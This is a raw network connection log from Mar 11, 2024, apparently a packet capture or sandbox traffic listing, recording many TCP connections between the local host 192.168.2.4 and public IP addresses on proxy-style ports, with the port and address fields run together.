                                                                Mar 11, 2024 16:15:14.597676039 CET503615678192.168.2.4171.100.23.244
                                                                Mar 11, 2024 16:15:14.598052979 CET503603128192.168.2.462.171.184.96
                                                                Mar 11, 2024 16:15:14.598092079 CET503624145192.168.2.4202.124.46.97
                                                                Mar 11, 2024 16:15:14.598093033 CET5036342771192.168.2.4162.240.239.103
                                                                Mar 11, 2024 16:15:14.598295927 CET5036480192.168.2.454.152.3.36
                                                                Mar 11, 2024 16:15:14.598735094 CET503668089192.168.2.4117.70.49.27
                                                                Mar 11, 2024 16:15:14.599443913 CET5036583192.168.2.4103.48.68.101
                                                                Mar 11, 2024 16:15:14.599777937 CET909150018120.37.121.209192.168.2.4
                                                                Mar 11, 2024 16:15:14.601334095 CET99950074167.249.29.218192.168.2.4
                                                                Mar 11, 2024 16:15:14.601425886 CET500189091192.168.2.4120.37.121.209
                                                                Mar 11, 2024 16:15:14.601429939 CET50074999192.168.2.4167.249.29.218
                                                                Mar 11, 2024 16:15:14.601697922 CET500189091192.168.2.4120.37.121.209
                                                                Mar 11, 2024 16:15:14.602082014 CET50074999192.168.2.4167.249.29.218
                                                                Mar 11, 2024 16:15:14.602185011 CET78535012467.43.228.253192.168.2.4
                                                                Mar 11, 2024 16:15:14.603429079 CET8050073222.255.238.159192.168.2.4
                                                                Mar 11, 2024 16:15:14.603554010 CET31285018980.251.219.40192.168.2.4
                                                                Mar 11, 2024 16:15:14.603563070 CET5007380192.168.2.4222.255.238.159
                                                                Mar 11, 2024 16:15:14.603569984 CET501247853192.168.2.467.43.228.253
                                                                Mar 11, 2024 16:15:14.603729010 CET501893128192.168.2.480.251.219.40
                                                                Mar 11, 2024 16:15:14.604011059 CET501893128192.168.2.480.251.219.40
                                                                Mar 11, 2024 16:15:14.604083061 CET5007380192.168.2.4222.255.238.159
                                                                Mar 11, 2024 16:15:14.604091883 CET501247853192.168.2.467.43.228.253
                                                                Mar 11, 2024 16:15:14.604806900 CET4981132221192.168.2.467.43.228.254
                                                                Mar 11, 2024 16:15:14.604806900 CET497838123192.168.2.420.24.43.214
                                                                Mar 11, 2024 16:15:14.604896069 CET497845678192.168.2.4178.212.51.79
                                                                Mar 11, 2024 16:15:14.606626987 CET718350185132.148.245.247192.168.2.4
                                                                Mar 11, 2024 16:15:14.606731892 CET242795014267.43.228.251192.168.2.4
                                                                Mar 11, 2024 16:15:14.607112885 CET5014224279192.168.2.467.43.228.251
                                                                Mar 11, 2024 16:15:14.607116938 CET501857183192.168.2.4132.148.245.247
                                                                Mar 11, 2024 16:15:14.607372999 CET501857183192.168.2.4132.148.245.247
                                                                Mar 11, 2024 16:15:14.607727051 CET4563950007103.212.93.241192.168.2.4
                                                                Mar 11, 2024 16:15:14.607757092 CET5014224279192.168.2.467.43.228.251
                                                                Mar 11, 2024 16:15:14.608163118 CET150824974245.77.111.135192.168.2.4
                                                                Mar 11, 2024 16:15:14.609263897 CET1492150165192.252.211.197192.168.2.4
                                                                Mar 11, 2024 16:15:14.610476017 CET50367999192.168.2.4190.97.238.88
                                                                Mar 11, 2024 16:15:14.610477924 CET503681981192.168.2.441.65.236.37
                                                                Mar 11, 2024 16:15:14.610783100 CET5036964654192.168.2.4162.19.7.53
                                                                Mar 11, 2024 16:15:14.610965967 CET312850058103.231.248.98192.168.2.4
                                                                Mar 11, 2024 16:15:14.610995054 CET5037034172192.168.2.4162.241.46.6
                                                                Mar 11, 2024 16:15:14.611099005 CET500583128192.168.2.4103.231.248.98
                                                                Mar 11, 2024 16:15:14.611308098 CET500583128192.168.2.4103.231.248.98
                                                                Mar 11, 2024 16:15:14.611309052 CET50371999192.168.2.4190.95.195.105
                                                                Mar 11, 2024 16:15:14.611669064 CET5037239789192.168.2.4209.142.64.219
                                                                Mar 11, 2024 16:15:14.611730099 CET503738811192.168.2.451.158.68.68
                                                                Mar 11, 2024 16:15:14.611788988 CET50374999192.168.2.4190.90.22.106
                                                                Mar 11, 2024 16:15:14.612041950 CET5037542571192.168.2.492.204.134.38
                                                                Mar 11, 2024 16:15:14.612078905 CET50376999192.168.2.4181.204.0.36
                                                                Mar 11, 2024 16:15:14.612251997 CET503788080192.168.2.4137.59.161.177
                                                                Mar 11, 2024 16:15:14.612253904 CET50377999192.168.2.4179.60.219.63
                                                                Mar 11, 2024 16:15:14.612375021 CET5037980192.168.2.4104.25.167.88
                                                                Mar 11, 2024 16:15:14.612524986 CET503805678192.168.2.4201.144.20.231
                                                                Mar 11, 2024 16:15:14.612622976 CET5038131247192.168.2.4202.40.181.220
                                                                Mar 11, 2024 16:15:14.612808943 CET503838888192.168.2.4136.244.99.51
                                                                Mar 11, 2024 16:15:14.612808943 CET503828080192.168.2.4182.52.229.165
                                                                Mar 11, 2024 16:15:14.612940073 CET503848181192.168.2.4103.234.28.211
                                                                Mar 11, 2024 16:15:14.613301992 CET5038680192.168.2.4172.67.231.3
                                                                Mar 11, 2024 16:15:14.613836050 CET5038780192.168.2.4115.42.45.1
                                                                Mar 11, 2024 16:15:14.614680052 CET5038980192.168.2.4203.57.51.53
                                                                Mar 11, 2024 16:15:14.614681959 CET503887890192.168.2.4116.5.187.116
                                                                Mar 11, 2024 16:15:14.614850044 CET50385999192.168.2.4201.71.3.42
                                                                Mar 11, 2024 16:15:14.614895105 CET414550199174.75.211.222192.168.2.4
                                                                Mar 11, 2024 16:15:14.615247011 CET501994145192.168.2.4174.75.211.222
                                                                Mar 11, 2024 16:15:14.615294933 CET503906522192.168.2.445.117.179.179
                                                                Mar 11, 2024 16:15:14.617292881 CET5039127102192.168.2.4128.199.196.31
                                                                Mar 11, 2024 16:15:14.617435932 CET503924145192.168.2.4197.234.13.17
                                                                Mar 11, 2024 16:15:14.617711067 CET50393999192.168.2.4191.97.9.228
                                                                Mar 11, 2024 16:15:14.617820024 CET5039449202192.168.2.451.161.131.84
                                                                Mar 11, 2024 16:15:14.618422031 CET263534997367.43.227.228192.168.2.4
                                                                Mar 11, 2024 16:15:14.618890047 CET108050006202.142.167.210192.168.2.4
                                                                Mar 11, 2024 16:15:14.618904114 CET503958080192.168.2.495.57.216.118
                                                                Mar 11, 2024 16:15:14.618933916 CET14315014872.10.164.178192.168.2.4
                                                                Mar 11, 2024 16:15:14.619071960 CET501481431192.168.2.472.10.164.178
                                                                Mar 11, 2024 16:15:14.619280100 CET501481431192.168.2.472.10.164.178
                                                                Mar 11, 2024 16:15:14.620402098 CET497468081192.168.2.4154.72.90.74
                                                                Mar 11, 2024 16:15:14.620404005 CET503968080192.168.2.45.78.89.192
                                                                Mar 11, 2024 16:15:14.620642900 CET5039760964192.168.2.4192.163.202.88
                                                                Mar 11, 2024 16:15:14.620845079 CET503988080192.168.2.4154.73.29.161
                                                                Mar 11, 2024 16:15:14.620843887 CET503999050192.168.2.445.113.80.37
                                                                Mar 11, 2024 16:15:14.621093988 CET504001080192.168.2.4202.162.219.10
                                                                Mar 11, 2024 16:15:14.621238947 CET8049966104.16.106.65192.168.2.4
                                                                Mar 11, 2024 16:15:14.622209072 CET103635015367.43.236.20192.168.2.4
                                                                Mar 11, 2024 16:15:14.623919010 CET5040180192.168.2.450.173.140.149
                                                                Mar 11, 2024 16:15:14.623922110 CET50402999192.168.2.4189.173.223.225
                                                                Mar 11, 2024 16:15:14.624254942 CET504032080192.168.2.4152.136.151.195
                                                                Mar 11, 2024 16:15:14.624761105 CET5040460200192.168.2.4162.241.137.197
                                                                Mar 11, 2024 16:15:14.624768019 CET504058080192.168.2.4213.184.153.66
                                                                Mar 11, 2024 16:15:14.625050068 CET5040680192.168.2.491.65.102.60
                                                                Mar 11, 2024 16:15:14.625588894 CET504073128192.168.2.4220.194.189.144
                                                                Mar 11, 2024 16:15:14.625763893 CET31284990018.134.236.231192.168.2.4
                                                                Mar 11, 2024 16:15:14.625848055 CET178935016072.10.160.90192.168.2.4
                                                                Mar 11, 2024 16:15:14.626425028 CET504084145192.168.2.472.195.114.169
                                                                Mar 11, 2024 16:15:14.627979994 CET31284990018.134.236.231192.168.2.4
                                                                Mar 11, 2024 16:15:14.628431082 CET5041039452192.168.2.4167.172.109.12
                                                                Mar 11, 2024 16:15:14.628597975 CET504098080192.168.2.4103.176.96.132
                                                                Mar 11, 2024 16:15:14.628844023 CET499003128192.168.2.418.134.236.231
                                                                Mar 11, 2024 16:15:14.628844023 CET5041180192.168.2.4172.67.3.98
                                                                Mar 11, 2024 16:15:14.629292965 CET504128080192.168.2.491.148.127.162
                                                                Mar 11, 2024 16:15:14.629537106 CET504136001192.168.2.420.106.146.212
                                                                Mar 11, 2024 16:15:14.629728079 CET8050100185.238.228.67192.168.2.4
                                                                Mar 11, 2024 16:15:14.629769087 CET8050100185.238.228.67192.168.2.4
                                                                Mar 11, 2024 16:15:14.629864931 CET5041480192.168.2.4104.24.193.186
                                                                Mar 11, 2024 16:15:14.629982948 CET50416999192.168.2.4190.114.245.122
                                                                Mar 11, 2024 16:15:14.629983902 CET5041537758192.168.2.437.32.98.160
                                                                Mar 11, 2024 16:15:14.630121946 CET8050100185.238.228.67192.168.2.4
                                                                Mar 11, 2024 16:15:14.630287886 CET8050227172.67.150.173192.168.2.4
                                                                Mar 11, 2024 16:15:14.630316019 CET5010080192.168.2.4185.238.228.67
                                                                Mar 11, 2024 16:15:14.630316019 CET5010080192.168.2.4185.238.228.67
                                                                Mar 11, 2024 16:15:14.630367041 CET5041780192.168.2.450.218.57.68
                                                                Mar 11, 2024 16:15:14.630599022 CET171454998567.43.236.18192.168.2.4
                                                                Mar 11, 2024 16:15:14.630628109 CET5041822735192.168.2.491.142.222.84
                                                                Mar 11, 2024 16:15:14.630723000 CET5022780192.168.2.4172.67.150.173
                                                                Mar 11, 2024 16:15:14.631149054 CET5022780192.168.2.4172.67.150.173
                                                                Mar 11, 2024 16:15:14.631917953 CET5041919599192.168.2.467.43.227.228
                                                                Mar 11, 2024 16:15:14.632103920 CET8050239104.20.24.214192.168.2.4
                                                                Mar 11, 2024 16:15:14.632127047 CET504205678192.168.2.436.67.14.195
                                                                Mar 11, 2024 16:15:14.632231951 CET5023980192.168.2.4104.20.24.214
                                                                Mar 11, 2024 16:15:14.632755041 CET5023980192.168.2.4104.20.24.214
                                                                Mar 11, 2024 16:15:14.632755995 CET5042180192.168.2.4104.25.81.82
                                                                Mar 11, 2024 16:15:14.633100986 CET5042215673192.168.2.4198.23.229.203
                                                                Mar 11, 2024 16:15:14.634396076 CET504238080192.168.2.4216.74.255.182
                                                                Mar 11, 2024 16:15:14.634402990 CET5042462801192.168.2.4146.59.147.11
                                                                Mar 11, 2024 16:15:14.635157108 CET504264145192.168.2.4103.58.16.57
                                                                Mar 11, 2024 16:15:14.635253906 CET5042546983192.168.2.4132.148.167.231
                                                                Mar 11, 2024 16:15:14.635493994 CET8050245172.67.38.96192.168.2.4
                                                                Mar 11, 2024 16:15:14.635528088 CET5042741491192.168.2.4167.172.109.12
                                                                Mar 11, 2024 16:15:14.635812044 CET5024580192.168.2.4172.67.38.96
                                                                Mar 11, 2024 16:15:14.636106014 CET4980180192.168.2.450.174.145.9
                                                                Mar 11, 2024 16:15:14.636106014 CET5024580192.168.2.4172.67.38.96
                                                                Mar 11, 2024 16:15:14.636610031 CET567850084202.165.47.49192.168.2.4
                                                                Mar 11, 2024 16:15:14.636627913 CET504284145192.168.2.4110.77.232.172
                                                                Mar 11, 2024 16:15:14.637558937 CET50430999192.168.2.4181.78.22.228
                                                                Mar 11, 2024 16:15:14.637587070 CET504295432192.168.2.445.196.151.84
                                                                Mar 11, 2024 16:15:14.638735056 CET504324145192.168.2.4103.66.233.225
                                                                Mar 11, 2024 16:15:14.638736010 CET5043180192.168.2.436.92.193.189
                                                                Mar 11, 2024 16:15:14.639053106 CET504334153192.168.2.4103.95.97.42
                                                                Mar 11, 2024 16:15:14.639424086 CET504345678192.168.2.4103.131.8.27
                                                                Mar 11, 2024 16:15:14.639507055 CET805025131.43.179.214192.168.2.4
                                                                Mar 11, 2024 16:15:14.639942884 CET5025180192.168.2.431.43.179.214
                                                                Mar 11, 2024 16:15:14.640238047 CET5025180192.168.2.431.43.179.214
                                                                Mar 11, 2024 16:15:14.640242100 CET5043541746192.168.2.451.79.87.144
                                                                Mar 11, 2024 16:15:14.641027927 CET80805024266.225.246.238192.168.2.4
                                                                Mar 11, 2024 16:15:14.641064882 CET41455024424.249.199.4192.168.2.4
                                                                Mar 11, 2024 16:15:14.641128063 CET504363629192.168.2.491.220.69.43
                                                                Mar 11, 2024 16:15:14.641153097 CET502428080192.168.2.466.225.246.238
                                                                Mar 11, 2024 16:15:14.641153097 CET502444145192.168.2.424.249.199.4
                                                                Mar 11, 2024 16:15:14.641429901 CET504373825192.168.2.4104.247.163.246
                                                                Mar 11, 2024 16:15:14.641433954 CET502428080192.168.2.466.225.246.238
                                                                Mar 11, 2024 16:15:14.641952038 CET414550155190.153.121.2192.168.2.4
                                                                Mar 11, 2024 16:15:14.642386913 CET80005007714.103.24.20192.168.2.4
                                                                Mar 11, 2024 16:15:14.642484903 CET501554145192.168.2.4190.153.121.2
                                                                Mar 11, 2024 16:15:14.642579079 CET504384145192.168.2.4168.205.217.13
                                                                Mar 11, 2024 16:15:14.642579079 CET500778000192.168.2.414.103.24.20
                                                                Mar 11, 2024 16:15:14.642750978 CET501554145192.168.2.4190.153.121.2
                                                                Mar 11, 2024 16:15:14.642915010 CET500778000192.168.2.414.103.24.20
                                                                Mar 11, 2024 16:15:14.643691063 CET504408888192.168.2.4217.219.74.130
                                                                Mar 11, 2024 16:15:14.643755913 CET504396821192.168.2.4198.12.255.193
                                                                Mar 11, 2024 16:15:14.643806934 CET504418080192.168.2.427.54.71.231
                                                                Mar 11, 2024 16:15:14.643928051 CET312849898160.16.90.35192.168.2.4
                                                                Mar 11, 2024 16:15:14.644606113 CET808950065111.225.152.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.644788027 CET504428888192.168.2.4120.79.101.0
                                                                Mar 11, 2024 16:15:14.646008968 CET5044420435192.168.2.451.89.173.40
                                                                Mar 11, 2024 16:15:14.646022081 CET504438080192.168.2.4193.34.95.110
                                                                Mar 11, 2024 16:15:14.646769047 CET5044580192.168.2.4133.232.90.96
                                                                Mar 11, 2024 16:15:14.646787882 CET543050089202.179.184.44192.168.2.4
                                                                Mar 11, 2024 16:15:14.646826029 CET5044680192.168.2.4154.118.228.212
                                                                Mar 11, 2024 16:15:14.646943092 CET500895430192.168.2.4202.179.184.44
                                                                Mar 11, 2024 16:15:14.647660017 CET500895430192.168.2.4202.179.184.44
                                                                Mar 11, 2024 16:15:14.649722099 CET5044729212192.168.2.492.204.135.203
                                                                Mar 11, 2024 16:15:14.649792910 CET5044849685192.168.2.4195.154.243.38
                                                                Mar 11, 2024 16:15:14.649965048 CET504494145192.168.2.492.207.253.226
                                                                Mar 11, 2024 16:15:14.650041103 CET5736450197162.241.53.72192.168.2.4
                                                                Mar 11, 2024 16:15:14.650155067 CET5045024543192.168.2.4209.159.153.19
                                                                Mar 11, 2024 16:15:14.650171995 CET93754974792.204.134.38192.168.2.4
                                                                Mar 11, 2024 16:15:14.650181055 CET5019757364192.168.2.4162.241.53.72
                                                                Mar 11, 2024 16:15:14.650408030 CET5019757364192.168.2.4162.241.53.72
                                                                Mar 11, 2024 16:15:14.650410891 CET5045216379192.168.2.451.158.77.220
                                                                Mar 11, 2024 16:15:14.651530027 CET8050268104.17.171.235192.168.2.4
                                                                Mar 11, 2024 16:15:14.651571035 CET5045131476192.168.2.4170.244.64.12
                                                                Mar 11, 2024 16:15:14.651721001 CET5026880192.168.2.4104.17.171.235
                                                                Mar 11, 2024 16:15:14.651721954 CET497735678192.168.2.4122.152.53.25
                                                                Mar 11, 2024 16:15:14.651738882 CET497358080192.168.2.4103.141.66.78
                                                                Mar 11, 2024 16:15:14.651745081 CET497388080192.168.2.4103.169.130.46
                                                                Mar 11, 2024 16:15:14.651745081 CET4973450640192.168.2.4203.161.32.242
                                                                Mar 11, 2024 16:15:14.651745081 CET497368080192.168.2.4103.186.8.162
                                                                Mar 11, 2024 16:15:14.651777983 CET497375678192.168.2.491.187.55.39
                                                                Mar 11, 2024 16:15:14.651948929 CET5026880192.168.2.4104.17.171.235
                                                                Mar 11, 2024 16:15:14.652853012 CET504533128192.168.2.4188.56.223.85
                                                                Mar 11, 2024 16:15:14.652853012 CET504548080192.168.2.4190.104.20.82
                                                                Mar 11, 2024 16:15:14.653078079 CET5045580192.168.2.4102.130.125.86
                                                                Mar 11, 2024 16:15:14.653671980 CET504575678192.168.2.4203.205.34.58
                                                                Mar 11, 2024 16:15:14.653708935 CET504568888192.168.2.4188.166.30.17
                                                                Mar 11, 2024 16:15:14.653806925 CET504585020192.168.2.4176.192.65.34
                                                                Mar 11, 2024 16:15:14.653985023 CET50460999192.168.2.445.174.248.19
                                                                Mar 11, 2024 16:15:14.653987885 CET504598080192.168.2.48.218.100.120
                                                                Mar 11, 2024 16:15:14.655255079 CET4127450200162.241.158.204192.168.2.4
                                                                Mar 11, 2024 16:15:14.655915022 CET504624145192.168.2.4199.58.185.9
                                                                Mar 11, 2024 16:15:14.655967951 CET504618082192.168.2.480.72.68.247
                                                                Mar 11, 2024 16:15:14.656573057 CET5046325491192.168.2.467.43.227.230
                                                                Mar 11, 2024 16:15:14.656747103 CET5046426976192.168.2.4124.198.74.90
                                                                Mar 11, 2024 16:15:14.657778978 CET5046564494192.168.2.437.187.77.58
                                                                Mar 11, 2024 16:15:14.658488035 CET504674145192.168.2.4184.178.172.3
                                                                Mar 11, 2024 16:15:14.658488035 CET5046680192.168.2.4140.83.32.175
                                                                Mar 11, 2024 16:15:14.658787966 CET5046880192.168.2.4172.67.14.237
                                                                Mar 11, 2024 16:15:14.659270048 CET504693128192.168.2.459.15.28.76
                                                                Mar 11, 2024 16:15:14.659495115 CET504718080192.168.2.4186.233.25.83
                                                                Mar 11, 2024 16:15:14.659496069 CET5047080192.168.2.4185.238.228.240
                                                                Mar 11, 2024 16:15:14.660100937 CET8049996104.18.20.160192.168.2.4
                                                                Mar 11, 2024 16:15:14.660964012 CET50472999192.168.2.4201.77.108.64
                                                                Mar 11, 2024 16:15:14.661437035 CET8050282172.67.182.126192.168.2.4
                                                                Mar 11, 2024 16:15:14.665440083 CET5028280192.168.2.4172.67.182.126
                                                                Mar 11, 2024 16:15:14.665743113 CET414550218184.170.249.65192.168.2.4
                                                                Mar 11, 2024 16:15:14.667306900 CET49744587192.168.2.4160.248.80.91
                                                                Mar 11, 2024 16:15:14.667306900 CET497405212192.168.2.445.11.95.165
                                                                Mar 11, 2024 16:15:14.667308092 CET4973980192.168.2.418.141.177.23
                                                                Mar 11, 2024 16:15:14.667414904 CET4973380192.168.2.441.74.91.244
                                                                Mar 11, 2024 16:15:14.667418003 CET497433129192.168.2.420.219.180.149
                                                                Mar 11, 2024 16:15:14.667418957 CET498499039192.168.2.467.43.227.228
                                                                Mar 11, 2024 16:15:14.668780088 CET8050303172.67.181.129192.168.2.4
                                                                Mar 11, 2024 16:15:14.669116974 CET217775019351.222.84.118192.168.2.4
                                                                Mar 11, 2024 16:15:14.669265032 CET5030380192.168.2.4172.67.181.129
                                                                Mar 11, 2024 16:15:14.671030045 CET414550255199.102.106.94192.168.2.4
                                                                Mar 11, 2024 16:15:14.674488068 CET31295007620.219.177.85192.168.2.4
                                                                Mar 11, 2024 16:15:14.676520109 CET592685019067.213.212.50192.168.2.4
                                                                Mar 11, 2024 16:15:14.676719904 CET5019059268192.168.2.467.213.212.50
                                                                Mar 11, 2024 16:15:14.680094004 CET5047353777192.168.2.4104.238.111.107
                                                                Mar 11, 2024 16:15:14.680866003 CET504744153192.168.2.4179.109.193.228
                                                                Mar 11, 2024 16:15:14.680870056 CET5030380192.168.2.4172.67.181.129
                                                                Mar 11, 2024 16:15:14.680955887 CET5028280192.168.2.4172.67.182.126
                                                                Mar 11, 2024 16:15:14.681025028 CET5019059268192.168.2.467.213.212.50
                                                                Mar 11, 2024 16:15:14.681426048 CET9995017045.229.34.174192.168.2.4
                                                                Mar 11, 2024 16:15:14.682225943 CET8050313104.17.166.210192.168.2.4
                                                                Mar 11, 2024 16:15:14.682270050 CET504758080192.168.2.4183.88.184.48
                                                                Mar 11, 2024 16:15:14.682398081 CET5031380192.168.2.4104.17.166.210
                                                                Mar 11, 2024 16:15:14.682605028 CET5031380192.168.2.4104.17.166.210
                                                                Mar 11, 2024 16:15:14.682913065 CET4974848892192.168.2.472.167.222.113
                                                                Mar 11, 2024 16:15:14.682913065 CET4985680192.168.2.450.172.218.160
                                                                Mar 11, 2024 16:15:14.683057070 CET134775020972.10.164.178192.168.2.4
                                                                Mar 11, 2024 16:15:14.683881998 CET5020913477192.168.2.472.10.164.178
                                                                Mar 11, 2024 16:15:14.684237957 CET4053650291162.214.225.223192.168.2.4
                                                                Mar 11, 2024 16:15:14.684278011 CET5020913477192.168.2.472.10.164.178
                                                                Mar 11, 2024 16:15:14.684317112 CET5029140536192.168.2.4162.214.225.223
                                                                Mar 11, 2024 16:15:14.684401035 CET777750051111.8.155.54192.168.2.4
                                                                Mar 11, 2024 16:15:14.684556007 CET5029140536192.168.2.4162.214.225.223
                                                                Mar 11, 2024 16:15:14.684612989 CET500517777192.168.2.4111.8.155.54
                                                                Mar 11, 2024 16:15:14.684767962 CET500517777192.168.2.4111.8.155.54
                                                                Mar 11, 2024 16:15:14.684931040 CET4262450274162.214.165.6192.168.2.4
                                                                Mar 11, 2024 16:15:14.685739040 CET414550230199.102.107.145192.168.2.4
                                                                Mar 11, 2024 16:15:14.685827971 CET502304145192.168.2.4199.102.107.145
                                                                Mar 11, 2024 16:15:14.686263084 CET5027442624192.168.2.4162.214.165.6
                                                                Mar 11, 2024 16:15:14.686697960 CET5027442624192.168.2.4162.214.165.6
                                                                Mar 11, 2024 16:15:14.686842918 CET976450042162.243.102.207192.168.2.4
                                                                Mar 11, 2024 16:15:14.686852932 CET502304145192.168.2.4199.102.107.145
                                                                Mar 11, 2024 16:15:14.686923027 CET500429764192.168.2.4162.243.102.207
                                                                Mar 11, 2024 16:15:14.687349081 CET500429764192.168.2.4162.243.102.207
                                                                Mar 11, 2024 16:15:14.687485933 CET976450042162.243.102.207192.168.2.4
                                                                Mar 11, 2024 16:15:14.687980890 CET8050024172.67.181.197192.168.2.4
                                                                Mar 11, 2024 16:15:14.688024998 CET504769764192.168.2.4162.243.102.207
                                                                Mar 11, 2024 16:15:14.688029051 CET805013123.227.38.198192.168.2.4
                                                                Mar 11, 2024 16:15:14.688114882 CET805013123.227.38.198192.168.2.4
                                                                Mar 11, 2024 16:15:14.688290119 CET805013123.227.38.198192.168.2.4
                                                                Mar 11, 2024 16:15:14.688406944 CET5013180192.168.2.423.227.38.198
                                                                Mar 11, 2024 16:15:14.691555977 CET5013180192.168.2.423.227.38.198
                                                                Mar 11, 2024 16:15:14.692091942 CET80005011714.103.24.148192.168.2.4
                                                                Mar 11, 2024 16:15:14.692305088 CET50005010549.228.131.169192.168.2.4
                                                                Mar 11, 2024 16:15:14.692389965 CET501178000192.168.2.414.103.24.148
                                                                Mar 11, 2024 16:15:14.692672968 CET501178000192.168.2.414.103.24.148
                                                                Mar 11, 2024 16:15:14.693268061 CET319795012251.77.65.164192.168.2.4
                                                                Mar 11, 2024 16:15:14.693522930 CET107105027337.187.77.58192.168.2.4
                                                                Mar 11, 2024 16:15:14.694969893 CET501055000192.168.2.449.228.131.169
                                                                Mar 11, 2024 16:15:14.694969893 CET501055000192.168.2.449.228.131.169
                                                                Mar 11, 2024 16:15:14.695439100 CET5027310710192.168.2.437.187.77.58
                                                                Mar 11, 2024 16:15:14.696242094 CET5027310710192.168.2.437.187.77.58
                                                                Mar 11, 2024 16:15:14.697165966 CET5678498971.15.62.12192.168.2.4
                                                                Mar 11, 2024 16:15:14.698282957 CET504773335192.168.2.467.43.236.20
                                                                Mar 11, 2024 16:15:14.698482037 CET415350071103.83.105.167192.168.2.4
                                                                Mar 11, 2024 16:15:14.698524952 CET497508081192.168.2.479.110.196.145
                                                                Mar 11, 2024 16:15:14.698524952 CET4975280192.168.2.4190.186.237.103
                                                                Mar 11, 2024 16:15:14.698985100 CET504793128192.168.2.4193.239.86.248
                                                                Mar 11, 2024 16:15:14.699038982 CET4974984192.168.2.4103.26.108.118
                                                                Mar 11, 2024 16:15:14.699043989 CET497943128192.168.2.446.245.77.52
                                                                Mar 11, 2024 16:15:14.699134111 CET497551080192.168.2.447.91.110.154
                                                                Mar 11, 2024 16:15:14.699134111 CET497548080192.168.2.4201.20.67.70
                                                                Mar 11, 2024 16:15:14.699150085 CET5047880192.168.2.4172.67.209.12
                                                                Mar 11, 2024 16:15:14.699367046 CET50481999192.168.2.4190.110.99.189
                                                                Mar 11, 2024 16:15:14.699398994 CET504805678192.168.2.491.247.92.63
                                                                Mar 11, 2024 16:15:14.699820042 CET5048280192.168.2.4104.20.103.68
                                                                Mar 11, 2024 16:15:14.699948072 CET900249852220.248.70.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.700057030 CET5048316379192.168.2.451.158.105.107
                                                                Mar 11, 2024 16:15:14.700113058 CET403514977451.222.241.157192.168.2.4
                                                                Mar 11, 2024 16:15:14.700351000 CET504849999192.168.2.4113.195.224.222
                                                                Mar 11, 2024 16:15:14.700517893 CET900249852220.248.70.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.700609922 CET900249852220.248.70.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.700850964 CET498529002192.168.2.4220.248.70.237
                                                                Mar 11, 2024 16:15:14.700850964 CET498529002192.168.2.4220.248.70.237
                                                                Mar 11, 2024 16:15:14.706974983 CET567850096223.25.98.82192.168.2.4
                                                                Mar 11, 2024 16:15:14.708636999 CET80004975814.103.24.148192.168.2.4
                                                                Mar 11, 2024 16:15:14.709388971 CET5678498971.15.62.12192.168.2.4
                                                                Mar 11, 2024 16:15:14.712372065 CET498975678192.168.2.41.15.62.12
                                                                Mar 11, 2024 16:15:14.712924004 CET498975678192.168.2.41.15.62.12
                                                                Mar 11, 2024 16:15:14.714165926 CET497568089192.168.2.4117.70.49.235
                                                                Mar 11, 2024 16:15:14.714165926 CET504855678192.168.2.41.15.62.12
                                                                Mar 11, 2024 16:15:14.714165926 CET4975749478192.168.2.4162.241.70.64
                                                                Mar 11, 2024 16:15:14.714184999 CET4976659920192.168.2.445.56.220.210
                                                                Mar 11, 2024 16:15:14.714184046 CET4975937736192.168.2.4207.180.234.220
                                                                Mar 11, 2024 16:15:14.714200974 CET497673125192.168.2.4103.226.232.188
                                                                Mar 11, 2024 16:15:14.714214087 CET497658888192.168.2.4200.174.198.95
                                                                Mar 11, 2024 16:15:14.714394093 CET5506650162167.86.115.103192.168.2.4
                                                                Mar 11, 2024 16:15:14.714718103 CET88885009793.171.220.229192.168.2.4
                                                                Mar 11, 2024 16:15:14.714906931 CET500978888192.168.2.493.171.220.229
                                                                Mar 11, 2024 16:15:14.716908932 CET3128497768.209.255.13192.168.2.4
                                                                Mar 11, 2024 16:15:14.716941118 CET500978888192.168.2.493.171.220.229
                                                                Mar 11, 2024 16:15:14.717195988 CET497763128192.168.2.48.209.255.13
                                                                Mar 11, 2024 16:15:14.717195988 CET497763128192.168.2.48.209.255.13
                                                                Mar 11, 2024 16:15:14.717847109 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.718508959 CET8050145104.20.123.164192.168.2.4
                                                                Mar 11, 2024 16:15:14.718523026 CET8050145104.20.123.164192.168.2.4
                                                                Mar 11, 2024 16:15:14.718806982 CET800049906178.128.156.219192.168.2.4
                                                                Mar 11, 2024 16:15:14.718831062 CET5014580192.168.2.4104.20.123.164
                                                                Mar 11, 2024 16:15:14.719252110 CET47115026567.43.227.227192.168.2.4
                                                                Mar 11, 2024 16:15:14.719265938 CET8050145104.20.123.164192.168.2.4
                                                                Mar 11, 2024 16:15:14.719944000 CET8050166172.67.182.0192.168.2.4
                                                                Mar 11, 2024 16:15:14.719985962 CET8050166172.67.182.0192.168.2.4
                                                                Mar 11, 2024 16:15:14.720103979 CET5014580192.168.2.4104.20.123.164
                                                                Mar 11, 2024 16:15:14.720511913 CET8050166172.67.182.0192.168.2.4
                                                                Mar 11, 2024 16:15:14.720537901 CET5016680192.168.2.4172.67.182.0
                                                                Mar 11, 2024 16:15:14.721009016 CET504868080192.168.2.4186.103.130.91
                                                                Mar 11, 2024 16:15:14.721280098 CET5016680192.168.2.4172.67.182.0
                                                                Mar 11, 2024 16:15:14.721393108 CET4097550128146.59.18.246192.168.2.4
                                                                Mar 11, 2024 16:15:14.721405983 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.721601963 CET8050028104.27.15.161192.168.2.4
                                                                Mar 11, 2024 16:15:14.721702099 CET5012840975192.168.2.4146.59.18.246
                                                                Mar 11, 2024 16:15:14.721949100 CET5012840975192.168.2.4146.59.18.246
                                                                Mar 11, 2024 16:15:14.722239971 CET805030412.176.231.147192.168.2.4
                                                                Mar 11, 2024 16:15:14.722498894 CET5030480192.168.2.412.176.231.147
                                                                Mar 11, 2024 16:15:14.722498894 CET5030480192.168.2.412.176.231.147
                                                                Mar 11, 2024 16:15:14.722523928 CET8050163104.21.194.182192.168.2.4
                                                                Mar 11, 2024 16:15:14.722609043 CET8050163104.21.194.182192.168.2.4
                                                                Mar 11, 2024 16:15:14.722803116 CET5016380192.168.2.4104.21.194.182
                                                                Mar 11, 2024 16:15:14.723761082 CET8050163104.21.194.182192.168.2.4
                                                                Mar 11, 2024 16:15:14.724739075 CET312849898160.16.90.35192.168.2.4
                                                                Mar 11, 2024 16:15:14.724888086 CET5016380192.168.2.4104.21.194.182
